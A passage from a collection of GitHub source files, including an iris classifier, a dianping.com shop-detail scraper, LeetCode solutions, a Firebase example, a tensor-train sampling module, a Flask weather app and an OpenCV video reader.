print(targets_mean/counter)\n print(auxis_mean/counter)\n\n\n\n feature_mean_unsqueeze = (feature_mean/counter).unsqueeze(0).unsqueeze(0).unsqueeze(-1)\n targets_mean_unsqueeze = (targets_mean/counter).unsqueeze(0).unsqueeze(0).unsqueeze(-1)\n auxis_mean_unsqueeze = (auxis_mean/counter).unsqueeze(0).unsqueeze(0).unsqueeze(-1)\n\n counter = 0\n for batch_idx, (feature, targets, auxis) in enumerate(dataLoader): \n if( batch_idx ==0):\n feature_mean = torch.mean(torch.square(feature - feature_mean_unsqueeze),dim = [0,1,3])\n targets_mean = torch.mean(torch.square(targets - targets_mean_unsqueeze),dim = [0,1,3])\n auxis_mean = torch.mean(torch.square(auxis - auxis_mean_unsqueeze) ,dim = [0,1,3])\n else:\n feature_mean += torch.mean(torch.square(feature - feature_mean_unsqueeze),dim = [0,1,3])\n targets_mean += torch.mean(torch.square(targets - targets_mean_unsqueeze),dim = [0,1,3])\n auxis_mean += torch.mean(torch.square(auxis - auxis_mean_unsqueeze) ,dim = [0,1,3])\n counter += 1\n\n print(torch.sqrt(feature_mean/counter))\n print(torch.sqrt(targets_mean/counter))\n print(torch.sqrt(auxis_mean/counter))\n \n\n\n\n\n \n\n\nif __name__ == \"__main__\":\n fun_calculate_wrf_statistics()\n","repo_name":"yaoyichen/radiationNet","sub_path":"utils/get_mean_std.py","file_name":"get_mean_std.py","file_ext":"py","file_size_in_byte":6686,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22302635301","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 19 22:09:44 2018\n\n@author: hussain\n\"\"\"\n#%%\n# Python version\nimport sys\nprint('Python: {}'.format(sys.version))\n# scipy\nimport scipy\nprint('scipy: {}'.format(scipy.__version__))\n# numpy\nimport numpy\nprint('numpy: {}'.format(numpy.__version__))\n# matplotlib\nimport matplotlib\nprint('matplotlib: {}'.format(matplotlib.__version__))\n# pandas\nimport pandas\nprint('pandas: {}'.format(pandas.__version__))\n# scikit-learn\nimport sklearn\nprint('sklearn: {}'.format(sklearn.__version__))\n#%%\n# Import Dependencies\nimport pandas as pd \nfrom pandas.tools.plotting import scatter_matrix\nimport matplotlib.pyplot as plt \nfrom sklearn import model_selection \nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\n\n\n#%%\n\n# Load Dataset \n\nURL = \"https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\"\nnames = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class']\ndataset = pd.read_csv(URL,names = names)\n\nprint(dataset.shape) \nprint(dataset.head(20))\nprint(dataset.describe())\n\nprint( dataset.groupby(\"sepal-length\").size())\n\n#%%\n# Data Viz\n\n# box and whisker \n\ndataset.plot(kind=box,layout= (2,2),sharex=False,sharey=False)\n\n#histogram\n\ndataset.hist()\n\n\n# Scatter Matrix \nscatter_matrix(dataset)\n\n\n#%%\n\n# Train Test Split \narray= dataset.values\nX = array[:,0:4]\nY = array[:,4]\nvalidation_size = 0.2\nseed = 7\nX_train,X_validation,Y_Train,Y_Validation = model_selection.train_test_split(X,Y,test_size=validation_size,random_state=seed)\n\n\n#%%\n\n#TEST HARNESS\n# Test Options and Evaluation Metric\n\nseed = 7 \nscoring = 'accuracy'\n\n#Building Models\n# Spot Check Algorithms\n\nmodels = []\nmodels.append(('LR',LogisticRegression()))\nmodels.append(('LDA',LinearDiscriminantAnalysis()))\nmodels.append(('KNN',KNeighborsClassifier()))\nmodels.append(('CART',DecisionTreeClassifier()))\nmodels.append(('NB',GaussianNB()))\nmodels.append(('SVM',SVC()))\n\nnames= []\nresults = []\nfor name,model in models:\n kfold=model_selection.KFold(n_splits = 10,random_state=seed)\n cv_results = model_selection.cross_val_score(model,X_train,Y_Train,cv=kfold)\n results.append(cv_results)\n names.append(name)\n msg = \"ModelName:%s ,Mean:%f, Std_dev(%f)\"%(name,cv_results.mean(),cv_results.std())\n print(msg)\n#%%\n# Compare Algorithms Graphically \n\nfig = plt.figure()\nfig.suptitle('Plot of Algo Comparison')\nax = fig.add_subplot(111)\nplt.boxplot(results)\nax.set_xticklabels(names)\nplt.show()\n\n#%%\n# SVM algorithm gives the best cross validation accuracy \n# Make Predictions on Validation Set\n\nSVM = SVC()\nSVM.fit(X_train,Y_Train) # Model Training\npredictions = SVM.predict(X_validation) # Model Prediction \nprint(accuracy_score(Y_Validation,predictions)) # % Accuracy \nprint(confusion_matrix(Y_Validation,predictions)) \nprint(classification_report(Y_Validation,predictions))\n\n# Done\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hussainliyaqatdar/pythonprojects","sub_path":"Iris_Dataset_Classifier.py","file_name":"Iris_Dataset_Classifier.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42723280677","text":"# -*- coding: utf-8 -*-\nimport json\nimport os\nimport re\nimport time\nimport os\nimport json\nfrom scrapy.selector import Selector\nimport requests\n\nurl = 'https://m.dianping.com/shop/92040324'\nheaders = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en',\n # 'DNT': '1',\n 'Host': 'm.dianping.com',\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Mobile Safari/537.36'\n}\ncurrent_path = os.path.dirname(__file__)\nparent_path = os.path.dirname(os.path.dirname(current_path))\npath = './data/search.add.2'\ncount = 0\nsession = requests.session()\nimport random\n\nwhile 1:\n try:\n time.sleep(2)\n session = requests.session()\n session.get('https://m.dianping.com/', headers=headers, timeout=3)\n print('retrying....')\n break\n except Exception as e:\n print(e)\n time.sleep(2)\n continue\n\nwith open('./data/detail.{}'.format(str(random.random())[-4:]),'w') as fw:\n with open(path, 'r') as f:\n line = f.readline()\n while line:\n if count < 28774:\n count+=1\n print(count)\n line = f.readline()\n continue\n try:\n data = json.loads(line)\n except Exception:\n continue\n shop_id = data['shop_id']\n temp = re.sub('(p2.*)$', '', data['url'])\n page = re.findall('(p\\d+)', data['url'])\n if page:\n temp += page[-1]\n headers['Referer'] = 'http://m.dianping.com/alashan/ch10/g134r3592'\n # shop_id = '100091635'\n url = 'http://www.dianping.com/shop/{}'.format(shop_id)\n print(url)\n while 1:\n try:\n r = session.get(url, headers=headers,timeout=5)\n except Exception as e:\n print(e)\n time.sleep(2)\n continue\n break\n if r.url != url:\n while 1:\n try:\n time.sleep(2)\n session = requests.session()\n session.get('https://m.dianping.com/', headers=headers,timeout=3)\n print('retrying....',shop_id)\n break\n except Exception as e:\n print(e)\n time.sleep(2)\n continue\n line = line\n continue\n print(r.status_code)\n html = r.text\n print(r.url)\n tel = Selector(text=html).css('.tel::attr(href)').extract()\n print(tel)\n result = {\n 'phone_num' : [i.replace('tel:', '') for i in tel],\n 'shop_name' : data['shop_name'] , # 名称,\n 'city' : data['city'] , # 城市,\n 'district' : data['district'] , # 区,\n 'map_poi' :data['map_poi'],\n 'shop_id' : data['shop_id'],\n 'rank_star' :data['rank_star'],\n 'region': data['region'] , # 商圈,\n 'area' :data['area'],\n 'address': data['address'] , # 地址,\n 'type' : data['type'], # 行业,\n 'review_num' : data['review_num'],\n }\n print(result)\n fw.write(json.dumps(result,ensure_ascii=False))\n fw.write('\\n')\n fw.flush()\n time.sleep(0.5)\n line = f.readline()\n","repo_name":"Pineapple1996/dianping_pro","sub_path":"detail_spider_request.py","file_name":"detail_spider_request.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71994861289","text":"import string \nclass Solution:\n def wordSubsets(self, words1: List[str], words2: List[str]) -> List[str]:\n \n def newDic():\n latters = [i for i in string.ascii_lowercase]\n dic = {}\n for char in latters:dic[char] = 0\n return dic\n \n def countfreq(word):\n dic = newDic()\n for char in word:dic[char] += 1\n return dic\n \n maxdic = newDic()\n \n for word in words2:\n curdic = countfreq(word)\n for char in curdic:maxdic[char] = max(maxdic[char],curdic[char])\n \n \n ans = []\n \n for word in words1:\n curdic = countfreq(word)\n curstring = \"\"\n maxstr = \"\"\n\n for char in maxdic:\n \n if int(curdic[char]) >= int(maxdic[char]) and maxdic[char] > 0: \n curstring += char\n \n \n if maxdic[char] > 0:\n maxstr += char\n \n if maxstr == curstring: ans.append(word)\n \n return ans","repo_name":"Atri10/Leet-code-Atri_Patel","sub_path":"916-word-subsets/916-word-subsets.py","file_name":"916-word-subsets.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40140474491","text":"from firebase import firebase\nfrom firebase_admin import credentials, auth, db, storage\nimport firebase_admin\n\ncred = credentials.Certificate(\"files/butilka-firebase-adminsdk-tqp9f-dd117b3e5a.json\")\nfirebase_admin.initialize_app(cred, {'databaseURL': 'https://butilka-default-rtdb.firebaseio.com/'})\n\nusers_database = {\n \"1274981264\": {\n \"username\": \"user_1\",\n \"last_activity\": 1619212557\n },\n \"4254785764\": {\n \"username\": \"user_2\",\n \"last_activity\": 1603212638\n }\n}\n\ndb.reference(\"/users_database/\").set(users_database)\n\nuser_3_id = \"2148172489\"\nuser_3 = {\n \"username\": \"user_3\",\n \"last_activity\": 1603212638\n}\n\ndb.reference(\"/users_database/\" + user_3_id).set(user_3)\n\nprint(db.reference(\"/users_database/\").get())","repo_name":"F4VOUR1TE/7th_parallel","sub_path":"BASA trial.py","file_name":"BASA trial.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3758004016","text":"from typing import List\nimport numpy as np\nfrom nn.nn import NeuralNet\nfrom nn.layers import Linear, Tanh\nfrom nn.optim import Adam\nfrom nn.loss import CrossEntropyLoss\nfrom nn.train import train\n\n\ndef binary_encode(x: int) -> List[int]:\n return [x >> i & 1 for i in range(10)]\n\n\ndef fizz_buzz_encode(x: int) -> List[int]:\n if x % 15 == 0:\n return [0, 0, 0, 1]\n elif x % 5 == 0:\n return [0, 0, 1, 0]\n elif x % 3 == 0:\n return [0, 1, 0, 0]\n else:\n return [1, 0, 0, 0]\n\n\ndef predict(net: NeuralNet) -> None:\n \"\"\"\n 验证准确率\n \"\"\"\n num_correct = 0\n for x in range(1, 101):\n predicted = net(binary_encode(x))\n predicted_idx = np.argmax(predicted)\n actual_idx = np.argmax(fizz_buzz_encode(x))\n labels = [str(x), 'fizz', 'buzz', 'fizzbuzz']\n if predicted_idx == actual_idx:\n num_correct += 1\n print(\n f'x : {x} | 预测值 : {labels[predicted_idx]} | 正确值 : {labels[actual_idx]}')\n print(num_correct, '/ 100')\n\n\ninputs = np.array(\n [binary_encode(x) for x in range(101, 1024)]\n)\n\ntargets = np.array(\n [fizz_buzz_encode(x) for x in range(101, 1024)]\n)\n\nnet = NeuralNet([\n Linear(input_size=10, output_size=50),\n Tanh(),\n Linear(input_size=50, output_size=4)\n])\n# 训练\ntrain(net, inputs, targets, num_epochs=2000,\n optimizer=Adam(), loss=CrossEntropyLoss())\n# 预测\npredict(net)\n","repo_name":"daHaoShuai/autograd","sub_path":"nn_fizz_buzz.py","file_name":"nn_fizz_buzz.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35850158520","text":"# encoding=utf-8\n\n'''\n3Sum:\nGiven an array S of n integers, are there elements a, b, c in S such that a + b + c = 0?\nFind all unique triplets in the array which gives the sum of zero.\nNote: The solution set must not contain duplicate triplets.\nFor example, given array S = [-1, 0, 1, 2, -1, -4],\nA solution set is:\n[\n [-1, 0, 1],\n [-1, -1, 2]\n]\n'''\n\n\nclass Solution:\n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n nums = sorted(nums)\n m = len(nums)\n ans = []\n duplic = set()\n for i in range(m - 2):\n if i > 0 and nums[i] == nums[i - 1]: continue\n tupl = self.findTwoNums(nums[i + 1:], -nums[i])\n for (a, b) in tupl:\n if (a, b) not in duplic:\n ans.append((nums[i], a, b))\n duplic.add((a, b))\n return ans\n\n def findTwoNums(self, nums, target):\n left = 0\n right = len(nums) - 1\n ans = []\n while left < right:\n if nums[left] + nums[right] == target:\n ans.append((nums[left], nums[right]))\n right -= 1\n left += 1\n elif nums[left] + nums[right] < target:\n left += 1\n else:\n right -= 1\n return ans\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.threeSum([-1, 0, 1, 2, -1, -4]))\n","repo_name":"feizhihui/LeetCode","sub_path":"page1/main15.py","file_name":"main15.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18324060743","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : unittest_mock.py\n# @Author: Lizi\n# @Date : 2020/12/21\n\nimport unittest\nfrom unittest import mock\nimport requests\n\n\nclass Mock(unittest.TestCase):\n def setUp(self) -> None:\n self.url = \"http://127.0.0.1/api/order/create/cc3bdda5c61ad0900474b6e095704105\"\n\n def tearDown(self) -> None:\n pass\n\n def test_case_01(self):\n data = {\n \"real_name\": \"\",\n \"phone\": \"\",\n \"addressId\": 1,\n \"useIntegral\": 0,\n \"couponId\": 0,\n \"payType\": \"yue\",\n \"pinkId\": 0,\n \"seckill_id\": 0,\n \"combinationId\": 0,\n \"bargainId\": 0,\n \"from\": \"weixinh5\",\n \"mark\": \"\",\n \"shipping_type\": 1,\n \"store_id\": 0\n }\n # 创建mock响应数据对象\n mock_res = requests.Response()\n # 设置状态码\n mock_res.status_code = 200\n # 设置返回的body数据\n mock_res._content = {\"status\": 200, \"msg\": \"微信支付成功\",\n \"data\": {\"status\": \"SUCCESS\",\n \"result\": {\"orderId\": \"wx160846682663298919\",\n \"key\": \"cc3bdda5c61ad0900474b6e095704105\"}}}\n with mock.patch.object(requests, 'post', return_value=mock_res):\n res = requests.post(self.url, data)\n # 设置的返回的body是json格式的,因此不能使用res.text获取body数据,只能使用res.content获取body数据\n print(res.content)\n return res.content\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"rage-vampire/Python","sub_path":"lizi_project/interface_test/mock/unittest_mock.py","file_name":"unittest_mock.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41427865452","text":"import numpy as np\nimport scipy.linalg as sla\nimport scipy as sp\n#from distributions import Funnel\nimport matplotlib.pyplot as plt\n#from MALA import mala\nimport torch\nimport tntorch as tn\nimport pickle\n#from distributions import Funnel\n\n\n#w = tt.cross.rect_cross\n\ndef make_meshgrids_lin(dots, d, steps):\n grids = []\n for k in range(d):\n start, end = dots[k]\n grid = torch.linspace(start, end, steps[k], dtype=torch.float64)\n grids.append(grid)\n return grids\n\n\ndef TT_cross_density1(domain, density, y=None):\n cross = tn.cross(function=density, domain=domain, function_arg=\"matrix\",\n rmax=20, kickrank=3, max_iter=10, device='cpu')\n return cross\n\n\ndef linear_core_integration(alpha, block):\n summation = (block[:, 1:(block.shape[1] - 1), :].sum(axis=1) +\n (block[:, (0, block.shape[1] - 1), :].sum(axis=1))) / 2\n return alpha * summation\n\n\ndef SIRT_integration(blocks, grids):\n # We want to have number of Choletsky decompositions.\n d = len(blocks)\n Ps = [torch.tensor([1])] * d # build P_k\n Rprev = torch.tensor([1.]).reshape((1,1))\n Ps[-1] = Rprev\n for i in range(d-1, 0, -1):\n block = blocks[i].clone().double()\n block = torch.einsum('abi, ij -> abj', block, Rprev)\n weight = torch.zeros(block.shape[1])\n alphas = grids[i][1:] - grids[i][:-1]\n weight[1:] += alphas\n weight[:-1] += alphas\n weight /= 2\n weight = torch.sqrt(weight)\n block = torch.einsum('abi, b-> abi', block, weight)\n block = block.reshape((block.shape[0], -1)).T # M = block.T block Now let's do QR\n R = torch.linalg.qr(block)[1].T\n Ps[i-1] = R\n Rprev = R\n return Ps\n\n\n\ndef SIRT_sampling(blocks, seeds, grids):\n d = len(blocks)\n Ps = SIRT_integration(blocks, grids)\n phis = [torch.zeros(1)] * (d + 1)\n phis[0] = torch.ones((seeds.shape[0], 1), dtype=torch.float64)\n # grid, distance = np.linspace(begin, end, k * (steps-1), retstep=True, endpoint=False)\n ans = torch.zeros_like(seeds, dtype=torch.float64)\n log_dens = torch.zeros(seeds.shape[0])\n # print(linear_summation)\n for i in range(d):\n grid = grids[i]\n block = blocks[i].double()\n #assert np.all(~np.isnan(block))\n G = torch.einsum('ai, ibc -> abc', phis[i].double(), block)\n new_phi = torch.empty((seeds.shape[0], block.shape[-1]))\n alphas = grid[1:] - grid[:-1]\n for l in range(seeds.shape[0]):\n marginal_pdf = ((G[l, ...] @ Ps[i].double())**2).sum(axis=-1)\n sub_integral = torch.zeros(marginal_pdf.shape[0])\n sub_integral[1:] += marginal_pdf[:-1]\n sub_integral[1:] += marginal_pdf[1:]\n sub_integral[1:] *= alphas/2\n marginal_cdf = torch.cumsum(sub_integral, 0)\n normalizing_constant = marginal_cdf[-1].item()\n marginal_cdf /= normalizing_constant\n marginal_pdf /= normalizing_constant\n if l == 0 and i == 0: # сохранение плотности для теста\n np.save(f'normal_density_{i}.npy', np.concatenate([grid.reshape((-1, 1)),\n marginal_pdf.reshape(-1, 1)], axis=1))\n if False:\n print(grid[\n torch.searchsorted(marginal_cdf, [0.1, 0.5, 0.9], side='left')\n ])\n q = seeds[l, i]\n sort_pos = torch.searchsorted(marginal_cdf, q)\n i1, i2 = sort_pos-1, sort_pos\n pdf1, pdf2 = marginal_pdf[i1], marginal_pdf[i2]\n cdf1, cdf2 = marginal_cdf[i1], marginal_cdf[i2]\n x1, x2 = grid[i1], grid[i2]\n pos = torch.searchsorted(grid, x1)\n #if q < cdf1:\n # print(q, cdf1)\n #elif q > cdf2:\n # print(q, cdf2)\n #assert cdf1 == marginal_cdf[pos]\n C = (q - cdf1)\n D = 2 * C * (pdf1 - pdf2) + pdf1**2 * (x1 - x2)\n D *= (x1-x2)\n h = pdf1 - pdf2\n if np.abs(h) >= 1e-10:\n new_x = (pdf1 * x2 - pdf2 * x1 - torch.sqrt(np.abs(D)))/h\n else:\n new_x = x1 + C/pdf1\n if new_x > x2:\n new_x = x2\n elif new_x < x1:\n new_x = x1\n linear_pi = block[:, i1, :] * (x2 - new_x) / (x2 - x1) + block[:, i2, :] * (new_x - x1) / (x2 - x1)\n lin_pdf = pdf1 * (x2 - new_x) / (x2 - x1) + pdf2 * (new_x - x1) / (x2 - x1)\n log_dens += torch.log(lin_pdf)\n ans[l, i] = new_x\n new_phi[l, :] = (phis[i][l, :].double()) @ (linear_pi)\n\n phis[i + 1] = new_phi\n return ans, log_dens\n\ndef SIRT_sample(F, q):\n blocks = F[0]\n grids = F[1]\n return SIRT_sampling(blocks, q, grids)\n\ndef Banana(a, b):\n def density(z):\n d = z.shape[1]\n even = np.arange(0, d, 2)\n odd = np.arange(1, d, 2)\n\n ll = (\n -0.5 * (z[..., odd] - b * z[..., even] ** 2 + (a**2)*b) ** 2\n - ((z[..., even]) ** 2) / (2 * a**2)\n )\n ll = (ll.sum(-1))/2 #+ 1\n final = torch.exp(ll.double())\n #print(final.max())\n #print(ll.max(), ll.min())\n return final\n\n return density\n\ndef log_grad_Funnel1(a, b):\n def pi(x):\n d = x.shape[1]\n ans = np.empty_like(x)\n x0 = x[:, 0]\n ans[:, 1:] = -x[:, 1:] * np.exp(-2 * b * x0).reshape(-1, 1)\n ans[:, 0] = -x0/a**2 + b * np.exp(-2 * b * x0) * (x[:, 1:]**2).sum(axis=1) - (d-1)*b\n return ans\n return pi\n\n# 6.3 -> 1.1588 -> 3.1588\n#d = 10\n#mu = np.zeros(d)\n#Sigma = np.eye(d)\n#start, end = -10, 10\n#steps = 10000\n#lambdas = np.arange(1, d + 1)\n#cross, alpha = TT_cross_density(\n# normal_density_general(mu, Sigma), start, end, steps, d, 2\n#)\n\n#ans, pdfs = TT_sampling(cross.to_list(cross), np.random.uniform(size=(2, d)),\n #start, end, steps, alpha, linear_core_integration)\n\n#print(ans)\n\nclass tensor:\n def __init__(self, f):\n self.core = f.core\n self.ps = f.ps\n self.n = f.n\n self.r = f.r\n self.d = f.d\n\ndef get_centers(a, n, d):\n cores_coords = np.arange(n)\n x = a * np.cos(2 * np.pi * cores_coords/n).reshape(-1, 1)\n y = a * np.sin(2 * np.pi * cores_coords/n).reshape(-1,1)\n concat = np.concatenate([x, y], axis=1)\n ans = np.random.uniform(-3, 3, (n, d)) #np.zeros((n, d-2)) # np.random.normal(0, 0.2, (n, d-2)) #\n #ans = np.concatenate([concat, w], axis=1)\n return ans\n\nif __name__ == '__main__':\n n_steps = 1\n dist = \"Funnel\"\n d = 30\n a = 5.0\n b = 0.02\n num_centers = 50\n sigma = 0.2\n mus = get_centers(5., num_centers, d)\n Sigmas = [sigma * np.eye(d)] * len(mus) #np.array([[2,0,0,1],[0,2,0,0],[0,0,2,0],[1,0,0,2]])\n target = Banana(a, b) # normal_density_general(np.zeros(d), Sigma) #\n #target1 = Funnel(a=a, b=b, dim=d)\n\n\n\n\n\n dots = [(-4., 6.)] * d\n dots[0] = (-15, 15)\n steps = [50] * d\n #lambdas = np.arange(1, d + 1)\n\n\n #grid = np.linspace(dots[0][0], dots[0][1], steps[0])\n #dens = tt.vector.from_list([np.exp(-grid**2/(2 * a**2 * d/4)).reshape(1,-1,1)])\n #y = dens\n #for i in range(1, d):\n # grid = np.linspace(dots[i][0], dots[i][1], steps[i])\n # dens = tt.vector.from_list([np.exp((grid - 1) ** 2 / (2 * a ** 2 * d / 4)).reshape(1,-1,1)])\n # y = tt.kron(y, dens)\n\n #grid = np.zeros(steps[0], dtype=float).reshape(1,-1,1)\n #grid[:, 850,:] = 1.\n domain = make_meshgrids_lin(dots, d, steps)\n cross = TT_cross_density1(domain, target)\n print(cross)\n #lists = cross.to_list(cross)\n ans, pdfs = SIRT_sampling(cross.cores, torch.rand(size=(2000, d)),\n domain)\n #np.save(f'ans{d}.npy', ans)\n #ans, accs = mala(ans, log_grad_Funnel1(a, b), Funnel1(a, b), 0.3, k=0)\n plt.scatter(ans[:, 0].numpy(), ans[:, 1].numpy())\n #plt.title(f'sqrt Sampling, d={d}')\n #plt.scatter(mus[:, 0], mus[:, 1], c='yellow', label='centers')\n #plt.legend()\n plt.show()\n #plt.scatter(ans[])\n #print(ans)\n\n","repo_name":"mac-mvak/VR_IS","sub_path":"torch_sirt.py","file_name":"torch_sirt.py","file_ext":"py","file_size_in_byte":8138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11394550802","text":"from flask import Flask, render_template, request, g\n\nimport os\nfrom SQLiteOp import connect_db\n\napp = Flask(__name__)\n\n\n# 请求之前被调用\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n\n# 响应后被调用\n@app.teardown_request\ndef teardowm_request(exception):\n g.db.close()\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n sqlstr = 'select * from stus'\n cur = g.db.execute(sqlstr)\n stus = []\n for row in cur.fetchall():\n print(row[0], row[1], row[2])\n dic = dict(no=row[1], name=row[2])\n stus.append(dic)\n print('stus', stus)\n # 调用模板\n return render_template(\"stulist.html\", title=\"学生列表\", stus=stus)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80, debug=True)\n","repo_name":"dian-zhang/PythonProject","sub_path":"Week11andWeek12/webapp/stulist.py","file_name":"stulist.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25009587638","text":"import os\nimport traceback\n\nimport numpy as np\nimport cv2\n\ndef load_dataset2(img_dir, categories, new_size = None, standardize = True, fit_new_shape = False):\n if not os.path.isdir(img_dir): # check if the init_dir exist or not\n return [], []\n \n image_file_info = []\n for root, dirs, files in os.walk(img_dir):\n image_file_info.extend([ (root, f) for f in files if f.endswith('.jpg') ])\n \n\n try:\n # img01 = cv2.imread(os.path.join(image_dir, image_file_name)) # type of img01 = 'numpy.ndarray'\n\n # alternative way for reading the image if the file path contains the Chinese characters. !!!\n img01 = cv2.imdecode(np.fromfile(os.path.join(image_dir, image_file_name), dtype = np.uint8), -1)\n if img01 is None:\n print(f\"img01 is None !! { os.path.join(image_dir, image_file_name) }\")\n continue\n \n if img01.ndim != 3:\n print(f\"img01.ndim != 3 !! { img01.shape }, { os.path.join(image_dir, image_file_name) }\")\n continue\n\n # True, 只過濾與 new_size 相同的, 正方形, height > width, height < width 的三種\n if fit_new_shape: \n if shape == 0: # 要正方形, 不是的離開\n if img01.shape[0] != img01.shape[1]: \n continue\n elif shape == 1: # 要 height > width 的, 不是的離開\n if img01.shape[0] <= img01.shape[1]: \n continue\n else: # 要 height < width 的, 不是的離開\n if img01.shape[0] >= img01.shape[1]: \n continue\n \n #print(f\"{ img01.shape }, { os.path.join(image_dir, image_file_name) }\")\n\n img02 = resize_img(img = img01, new_height = new_size[0], new_width = new_size[1])\n img02 = img02.astype('float32')\n img03 = std_img(img02) if standardize else img02\n if img03 is None:\n continue\n else:\n images.append(img03)\n label = categories[folder_name.upper()]\n labels.append(label)\n except:\n ex = traceback.format_exc()\n print(ex) # log the error\n\n return images, labels\n","repo_name":"chinghancheng/4th-DL-CVMarathon","sub_path":"Homework/final_exam/utils/image_utils.py","file_name":"image_utils.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32284109015","text":"from matplotlib import pyplot as plt\nimport cv2\nimport numpy as np\n\nimg = cv2.imread('lena.jpg', -1)\ncv2.imshow('image', img)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # converts BGR to RGB\n\nplt.imshow(img)\nplt.xticks([], plt.yticks([])) # delete x, y coordinates on plt img\nplt.show()\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"Drom0s137/OpenCVBasicFunctions","sub_path":"matplotlib implementation.py","file_name":"matplotlib implementation.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11030206403","text":"import json\nfrom flask import Flask, request, render_template\nimport requests\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n # User submits location\n if 'location' not in request.form:\n return render_template('index.html', error='Please enter a location')\n location = request.form['location']\n\n # Make API call to OpenMeteo geocoding API\n url = f\"https://geocoding-api.open-meteo.com/v1/search?name={location}&language=en&count=1&format=json\"\n response = requests.get(url)\n data = response.json()\n\n # Extract latitude and longitude coordinates from response\n lat = str(data['results'][0]['latitude'])\n lon = str(data['results'][0]['longitude'])\n\n # Make API call to OpenMeteo weather API to get forecast data\n url = f\"https://api.open-meteo.com/v1/forecast?latitude={lat}&longitude={lon}&hourly=temperature_2m,precipitation_probability,uv_index¤t_weather=true&temperature_unit=fahrenheit&timezone=America%2FNew_York\"\n response = requests.get(url)\n data = response.json()\n\n # Extract 10 day forecast data\n forecast = []\n for i in range(len(data['hourly']['time'])):\n date = data['hourly']['time'][i]\n temp = data['hourly']['temperature_2m'][i]\n precip = data['hourly']['precipitation_probability'][i]\n uv = data['hourly']['uv_index'][i]\n forecast.append({'date': date, 'temp': temp, 'precip': precip, 'uv': uv})\n\n location = location.title()\n print(location)\n\n # print(forecast)\n # Render forecast template with forecast data\n return render_template('forecast.html', location=location, forecast=json.dumps(forecast))\n\n # Render home template if no location submitted\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)","repo_name":"smquadrat/weather-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11922457924","text":"import cv2\r\ncapture = cv2.VideoCapture(\"videos/CC.mp4\") #It takes either integer arguments when you have a webcam (0) or path of the video\r\n#We will make a loop to loop on each frame of the video and read it\r\nwhile True:\r\n isTrue, frame = capture.read() #The capture will read frame by frame and store it in frame variable and isTrue to check if its read successfully or not.\r\n cv2.imshow(\"Coffee\", frame) #This will show frame by frame.\r\n if cv2.waitKey(0) & 0xFF==ord('d'): #This to break out of the loop when the d is pressed & break out of loop (Stop Video)\r\n break\r\n capture.release() #Release all the capture device\r\n cv2.destroyAllWindows() #Destory All Windows\r\n#-215 Assertion Failed means that opencv cannot find media files in this location and Also for videos this means no frames are found after the last frame so it broke out automatically","repo_name":"salmayasserahmed/OpenCV-Python","sub_path":"Basics/ReadVideo.py","file_name":"ReadVideo.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40264058573","text":"#User function Template for python3\n\nclass Solution:\n def solve(self, X, 